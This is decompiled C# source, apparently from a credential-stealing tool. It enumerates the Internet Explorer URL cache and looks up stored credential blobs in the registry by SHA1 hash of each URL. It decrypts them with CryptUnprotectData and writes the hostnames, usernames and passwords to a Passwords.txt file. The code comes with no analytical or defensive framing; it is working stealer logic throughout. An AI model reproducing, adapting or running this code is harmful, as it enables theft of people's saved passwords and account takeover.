// Token: 0x060000BE RID: 190 RVA: 0x00009404 File Offset: 0x00007604 public static void Start() { int num = 0; Internet_Explorer.FindFirstUrlCacheEntry(null, IntPtr.Zero, ref num); if (Marshal.GetLastWin32Error() != 259) { int num2 = num; IntPtr intPtr = Marshal.AllocHGlobal(num2); try { IntPtr hEnumHandle = Internet_Explorer.FindFirstUrlCacheEntry(null, intPtr, ref num); bool flag; do { string text = ((Internet_Explorer.INTERNET_CACHE_ENTRY_INFO)Marshal.PtrToStructure(intPtr, typeof(Internet_Explorer.INTERNET_CACHE_ENTRY_INFO))).lpszSourceUrlName.ToLower(); text = text.Substring(text.IndexOf("@") + 1); if (text.IndexOf("?") > 0) { text = text.Substring(0, text.IndexOf("?")); } string sha1Hash = Internet_Explorer.GetSHA1Hash(text, (text.Length + 1) * 2); byte[] array = (byte[])Registry.CurrentUser.OpenSubKey(Internet_Explorer.IE_KEY).GetValue(sha1Hash, null); if (array != null) { if (!Internet_Explorer.visited.Contains(text)) { Internet_Explorer.DecryptCredential(text, sha1Hash, array.Length, array); Internet_Explorer.visited = Internet_Explorer.visited + text + " "; } } else { text += "/"; string sha1Hash2 = Internet_Explorer.GetSHA1Hash(text, (text.Length + 1) * 2); byte[] array2 = (byte[])Registry.CurrentUser.OpenSubKey(Internet_Explorer.IE_KEY).GetValue(sha1Hash2, null); if (array2 != null && !Internet_Explorer.visited.Contains(text)) { Internet_Explorer.DecryptCredential(text, sha1Hash2, array2.Length, array2); Internet_Explorer.visited = Internet_Explorer.visited + text + " "; } } num = num2; flag = Internet_Explorer.FindNextUrlCacheEntry(hEnumHandle, intPtr, ref num); if ((flag || Marshal.GetLastWin32Error() != 259) && !flag && num > num2) { num2 = num; IntPtr cb = new IntPtr(num2); intPtr = Marshal.ReAllocHGlobal(intPtr, cb); flag = true; } }while (flag); } finally { Marshal.FreeHGlobal(intPtr); } } }
// Token: 0x060000BD RID: 189 RVA: 0x0000931C File Offset: 0x0000751C public static string GetSHA1Hash(string pbData, int length) { IntPtr hHash = 0; IntPtr hProv = 0; byte[] array = new byte[21]; string text = ""; int num = 20; Internet_Explorer.CryptAcquireContext(ref hProv, null, null, 1U, 0U); Internet_Explorer.CryptCreateHash(hProv, 32772U, IntPtr.Zero, 0U, ref hHash); Internet_Explorer.CryptHashData(hHash, Internet_Explorer.VarPtr(pbData), length, 0U); Internet_Explorer.CryptGetHashParam(hHash, 2, array, ref num, 0); Internet_Explorer.CryptDestroyHash(hHash); Internet_Explorer.CryptReleaseContext(hProv, 0U); int i = 0; while (i < 20) { text += Strings.Right("00" + array[i].ToString("X"), 2); Math.Max(Interlocked.Increment(ref i), i - 1); } return(text + Strings.Right("00" + Internet_Explorer.CheckSum(text).ToString("X"), 2)); }
// Token: 0x060000B9 RID: 185 RVA: 0x00009020 File Offset: 0x00007220 public static void DecryptCredential(string sURL, string sHash, int Length, byte[] data) { List <string[]> list = new List <string[]>(); Internet_Explorer.DATA_BLOB data_BLOB = default(Internet_Explorer.DATA_BLOB); Internet_Explorer.DATA_BLOB data_BLOB2 = default(Internet_Explorer.DATA_BLOB); Internet_Explorer.DATA_BLOB data_BLOB3 = default(Internet_Explorer.DATA_BLOB); Internet_Explorer.StringIndexHeader stringIndexHeader = default(Internet_Explorer.StringIndexHeader); Internet_Explorer.StringIndexEntry stringIndexEntry = default(Internet_Explorer.StringIndexEntry); IntPtr intPtr = Marshal.AllocHGlobal(Length); Marshal.Copy(data, 0, intPtr, Length); data_BLOB.cbData = Length; data_BLOB.pbData = intPtr; data_BLOB3.cbData = (sURL.Length + 1) * 2; data_BLOB3.pbData = Internet_Explorer.VarPtr(sURL); if (Internet_Explorer.CryptUnprotectData(ref data_BLOB, 0, ref data_BLOB3, 0, 0, 0, ref data_BLOB2)) { IntPtr ptr = new IntPtr(data_BLOB2.pbData.ToInt32() + (int)Marshal.ReadByte(data_BLOB2.pbData)); stringIndexHeader = (Internet_Explorer.StringIndexHeader)Marshal.PtrToStructure(ptr, stringIndexHeader.GetType()); if (stringIndexHeader.dwType == 1 && stringIndexHeader.dwEntriesCount >= 2) { IntPtr ptr2 = new IntPtr(ptr.ToInt32() + stringIndexHeader.dwStructSize); IntPtr intPtr2 = new IntPtr(ptr2.ToInt32() + stringIndexHeader.dwEntriesCount * Marshal.SizeOf <Internet_Explorer.StringIndexEntry>(stringIndexEntry)); int num = 0; while ((double)num < (double)stringIndexHeader.dwEntriesCount / 2.0) { if (num != 0) { ptr2 = new IntPtr(ptr2.ToInt32() + Marshal.SizeOf <Internet_Explorer.StringIndexEntry>(stringIndexEntry)); } stringIndexEntry = (Internet_Explorer.StringIndexEntry)Marshal.PtrToStructure(ptr2, stringIndexEntry.GetType()); IntPtr ptr3 = new IntPtr(intPtr2.ToInt32() + stringIndexEntry.dwDataOffset); string text = Marshal.PtrToStringAuto(ptr3); ptr2 = new IntPtr(ptr2.ToInt32() + Marshal.SizeOf <Internet_Explorer.StringIndexEntry>(stringIndexEntry)); stringIndexEntry = (Internet_Explorer.StringIndexEntry)Marshal.PtrToStructure(ptr2, stringIndexEntry.GetType()); ptr3 = new IntPtr(intPtr2.ToInt32() + stringIndexEntry.dwDataOffset); string text2 = Marshal.PtrToStringAuto(ptr3); string[] item = new string[] { sURL, text, text2, "Internet Explorer" }; list.Add(item); Math.Max(Interlocked.Increment(ref num), num - 1); } } string str = Program.path + "\\"; foreach (string[] array in list) { Directory.CreateDirectory(str + array[3]); using (StreamWriter streamWriter = new StreamWriter(str + array[3] + "\\Passwords.txt", true)) { streamWriter.WriteLine(string.Concat(new string[] { "\n[PASSWORD]\nHostname: ", array[0], "\nUsername: "******"\nPassword: ", array[2] })); } } } }